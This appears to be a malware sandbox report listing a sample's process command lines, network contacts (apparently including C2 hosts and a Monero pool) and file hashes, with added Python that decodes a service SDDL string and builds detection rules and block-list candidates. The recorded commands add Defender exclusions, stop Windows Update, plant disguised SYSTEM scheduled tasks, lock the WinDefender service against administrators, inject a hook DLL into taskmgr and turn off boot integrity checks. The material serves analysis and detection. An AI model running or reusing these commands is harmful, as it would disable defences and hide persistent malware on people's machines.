CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe

"C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {AD812B81-F212-47D8-B785-2640B8481481} S-1-5-21-3518257231-2980324860-1431329550-1000:VWMLZJGN\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230702001509.log C:\Windows\Logs\CBS\CbsPersist_20230702001509.cab

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {8750CB4D-8FD1-4C47-BEFF-24F4B57F29B4} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
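
The command lines above show the sample's hardening and persistence steps in the clear: a service ACL rewritten with sc sdset, a scheduled task installed as SYSTEM under a Google-updater name, a second task named csrss pointing at C:\Windows\rss, every powercfg sleep and hibernate timeout zeroed, the Windows Update services stopped, and Defender exclusions added for the whole profile and Program Files. The following Python is an added example, not part of the sandbox output: it decodes the SDDL string applied to the WinDefender service and runs a few detection rules over constructed process-creation records whose command lines are quoted from the list above. The rule names, pids and record layout are this example's own choices.

```python
"""Command-line triage for the process tree recorded above.

Added example, not part of the sandbox output. Part 1 decodes the SDDL string
that `sc sdset WinDefender ...` applies to the service of that name. Part 2 runs
a few rules over constructed process-creation records whose command lines are
quoted from the list above; pids, rule names and the record layout are this
example's own choices.
"""
import re

# Service-specific rights, plus the standard rights, as abbreviated in SDDL.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
TRUSTEES = {"SY": "LocalSystem", "BA": "Administrators", "IU": "Interactive",
            "SU": "Service", "WD": "Everyone"}


def parse_dacl(sddl):
    """Return the DACL ACEs of a service SDDL string as dicts (SACL ignored)."""
    m = re.search(r"D:((?:\([^)]*\))+)", sddl)
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", m.group(1) if m else ""):
        ace_type, _flags, rights, _obj, _inh, sid = ace.split(";")[:6]
        aces.append({
            "type": {"A": "allow", "D": "deny"}.get(ace_type, ace_type),
            "trustee": TRUSTEES.get(sid, sid),
            "rights": [SERVICE_RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                       for i in range(0, len(rights), 2)],
        })
    return aces


def admin_stop_denied(sddl):
    """True if a deny ACE takes SERVICE_STOP away from Administrators."""
    return any(a["type"] == "deny" and a["trustee"] == "Administrators"
               and "SERVICE_STOP" in a["rights"] for a in parse_dacl(sddl))


def admin_can_reset_dacl(sddl):
    """True if Administrators keep WRITE_DAC, so `sc sdset` can undo the change."""
    return any(a["type"] == "allow" and a["trustee"] == "Administrators"
               and "WRITE_DAC" in a["rights"] for a in parse_dacl(sddl))


# A record matches a rule when every regex in the rule's list matches it.
RULES = [
    ("task_as_system_fake_google_updater",
     [r"(schtasks.*?/ru\s+'?System'?|Register-ScheduledTask.*?-User\s+'System')",
      r"Program Files\\Google\\Chrome\\updater\.exe"]),
    ("task_named_csrss_outside_system32",
     [r"schtasks.*?/TR\s+\"?C:\\Windows\\rss\\csrss\.exe", r"/TN\s+csrss"]),
    ("sleep_and_hibernate_disabled",
     [r"powercfg\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0"]),
    ("windows_update_services_stopped",
     [r"sc\s+stop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)"]),
    ("defender_exclusion_on_broad_paths",
     [r"Add-MpPreference.*-ExclusionPath"]),
]


def triage(records):
    """Return (pid, rule) pairs for every record that matches a rule."""
    hits = []
    for rec in records:
        cmd = rec["cmdline"]
        for name, patterns in RULES:
            if all(re.search(p, cmd, re.I) for p in patterns):
                hits.append((rec["pid"], name))
        m = re.search(r"sc\s+sdset\s+(\S+)\s+(\S+)", cmd, re.I)
        if m and admin_stop_denied(m.group(2)):
            hits.append((rec["pid"], "service_dacl_denies_stop:" + m.group(1)))
    return hits


SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)"
        "(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
        "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Constructed records: invented pids, command lines quoted from the report,
# plus one harmless powercfg invocation as a control.
RECORDS = [
    {"pid": 1, "cmdline": "sc sdset WinDefender " + SDDL},
    {"pid": 2, "cmdline": '"C:\\Windows\\system32\\schtasks.exe" /create /f '
     "/sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC "
     "/tr \"'C:\\Program Files\\Google\\Chrome\\updater.exe'\""},
    {"pid": 3, "cmdline": "schtasks /CREATE /SC ONLOGON /RL HIGHEST "
     '/TR "C:\\Windows\\rss\\csrss.exe" /TN csrss /F'},
    {"pid": 4, "cmdline": "powercfg /x -standby-timeout-dc 0"},
    {"pid": 5, "cmdline": "sc stop WaaSMedicSvc"},
    {"pid": 6, "cmdline": "powershell.exe Add-MpPreference -ExclusionPath "
     "@($env:UserProfile, $env:ProgramFiles) -Force"},
    {"pid": 7, "cmdline": "powercfg /list"},
]

if __name__ == "__main__":
    for ace in parse_dacl(SDDL):
        print(ace)
    for hit in triage(RECORDS):
        print(hit)
```

Decoding the descriptor shows why the sc sdset line matters: the ACE (D;;WPDT;;;BA) denies Administrators SERVICE_STOP and SERVICE_PAUSE_CONTINUE, so sc stop WinDefender from an elevated prompt fails with access denied, while LocalSystem keeps SERVICE_STOP in its allow ACE. The preceding allow ACE for Administrators still includes WRITE_DAC and DELETE, so an administrator can restore the descriptor with sc sdset, or issue the stop from a SYSTEM context, before removing the service; admin_can_reset_dacl reports exactly that. The control record (powercfg /list) matches nothing, which is the check to keep when adding rules of this kind to a detection pipeline.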

Network

Country  Destination             Domain                                                     Proto
RU       5.42.65.80:80           5.42.65.80                                                 tcp
DE       45.9.74.80:80           45.9.74.80                                                 tcp
NL       45.66.230.149:80        45.66.230.149                                              tcp
NL       45.12.253.56:80         45.12.253.56                                               tcp
US       8.8.8.8:53              rcn.tuktuk.ug                                              udp
NL       85.209.3.4:11285        rcn.tuktuk.ug                                              tcp
NL       85.209.3.4:11285        rcn.tuktuk.ug                                              tcp
NL       85.209.3.4:11285        rcn.tuktuk.ug                                              tcp
US       8.8.8.8:53              f73d87fc-e6ba-451d-82b7-96201f201a06.uuid.duniadekho.bar   udp
US       8.8.8.8:53              msdl.microsoft.com                                         udp
US       204.79.197.219:443      msdl.microsoft.com                                         tcp
US       8.8.8.8:53              vsblobprodscussu5shard30.blob.core.windows.net             udp
US       20.150.38.228:443       vsblobprodscussu5shard30.blob.core.windows.net             tcp
US       8.8.8.8:53              vsblobprodscussu5shard58.blob.core.windows.net             udp
US       20.150.79.68:443        vsblobprodscussu5shard58.blob.core.windows.net             tcp
US       8.8.8.8:53              server1.duniadekho.bar                                     udp
BG       185.82.216.50:443       server1.duniadekho.bar                                     tcp
US       8.8.8.8:53              cdn.discordapp.com                                         udp
US       162.159.129.233:443     cdn.discordapp.com                                         tcp
US       8.8.8.8:53              stun4.l.google.com                                         udp
US       74.125.204.127:19302    stun4.l.google.com                                         udp
US       8.8.8.8:53              luckytradeone.com                                          udp
US       172.67.181.198:443      luckytradeone.com                                          tcp
US       8.8.8.8:53              xmr.2miners.com                                            udp
DE       162.19.139.184:12222    xmr.2miners.com                                            tcp
US       8.8.8.8:53              stun1.l.google.com                                         udp
US       142.251.125.127:19302   stun1.l.google.com                                         udp
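
The table above mixes two kinds of rows: DNS lookups sent to the sandbox resolver (8.8.8.8:53), where the Domain column is the name being queried, and the connections that followed. The Python below is an added example, not part of the sandbox output, that splits the two, builds block-list candidates and flags the pool connection. ALLOWLIST and MINING_POOLS encode this example's own assumptions: that the Microsoft symbol server and the Azure blob storage behind the ntkrnlmp.pdb and winload_prod.pdb requests recorded under Files, and the Google STUN servers, are incidental infrastructure rather than attacker-controlled, and that xmr.2miners.com is a Monero mining pool. TABLE is quoted from the report.

```python
"""Indicator extraction from the Network table of this report.

Added example, not part of the sandbox output. Rows whose destination is the
sandbox resolver (8.8.8.8:53, udp) are DNS lookups, and there the Domain column
is the queried name; every other row is a connection. The script separates the
two, drops infrastructure the sample touched only incidentally (ALLOWLIST is
this example's own judgement), and flags the Monero pool (MINING_POOLS, also an
assumption). TABLE is quoted from the report.
"""
from collections import namedtuple

Row = namedtuple("Row", "country ip port domain proto")

TABLE = """\
Country Destination Domain Proto
RU 5.42.65.80:80 5.42.65.80 tcp
DE 45.9.74.80:80 45.9.74.80 tcp
NL 45.66.230.149:80 45.66.230.149 tcp
NL 45.12.253.56:80 45.12.253.56 tcp
US 8.8.8.8:53 rcn.tuktuk.ug udp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
US 8.8.8.8:53 f73d87fc-e6ba-451d-82b7-96201f201a06.uuid.duniadekho.bar udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 8.8.8.8:53 server1.duniadekho.bar udp
BG 185.82.216.50:443 server1.duniadekho.bar tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 stun4.l.google.com udp
US 74.125.204.127:19302 stun4.l.google.com udp
US 8.8.8.8:53 luckytradeone.com udp
US 172.67.181.198:443 luckytradeone.com tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 stun1.l.google.com udp
US 142.251.125.127:19302 stun1.l.google.com udp
"""

RESOLVER = ("8.8.8.8", 53)
# Assumption: incidental infrastructure (symbol server, symbol blob storage,
# Google STUN), not attacker-controlled; exact match or suffix match.
ALLOWLIST = ("msdl.microsoft.com", ".blob.core.windows.net", ".l.google.com")
# Assumption: a well-known Monero pool, i.e. the payload is a coin miner.
MINING_POOLS = ("xmr.2miners.com",)


def parse_table(text):
    """Parse the whitespace-separated table; the header row has no ip:port."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or ":" not in parts[1]:
            continue
        country, dest, domain, proto = parts
        ip, port = dest.rsplit(":", 1)
        rows.append(Row(country, ip, int(port), domain, proto))
    return rows


def allowlisted(name):
    return any(name == a or name.endswith(a) for a in ALLOWLIST)


def extract(rows):
    """Split lookups from connections and build block-list candidates."""
    lookups = [r.domain for r in rows
               if (r.ip, r.port) == RESOLVER and r.proto == "udp"]
    conns = [r for r in rows if (r.ip, r.port) != RESOLVER]
    domains = sorted({d for d in lookups if not allowlisted(d)})
    endpoints = sorted({(r.ip, r.port, r.proto) for r in conns
                        if not allowlisted(r.domain)})
    mining = sorted({(r.domain, r.ip, r.port) for r in conns
                     if r.domain in MINING_POOLS})
    # Names that were resolved but never connected to (NXDOMAIN, or a name
    # the sample only probed); still worth keeping as indicators.
    dns_only = sorted(set(domains) - {r.domain for r in conns})
    return {"lookups": lookups, "domains": domains, "endpoints": endpoints,
            "mining": mining, "dns_only": dns_only}


if __name__ == "__main__":
    result = extract(parse_table(TABLE))
    for key in ("domains", "endpoints", "mining", "dns_only"):
        print(key, result[key])
```

The four bare-IP connections on port 80 had no preceding lookup, so they survive only as ip:port pairs; rcn.tuktuk.ug:11285 is the one name the sample connected to three times, and the uuid.duniadekho.bar name was queried but never connected to. Whether cdn.discordapp.com or luckytradeone.com belongs on a block list is a policy call the script leaves to the reader; it only reports them.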

Files

\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe

MD5 2d257873ee0ae75c9b89bd340e3e3da6
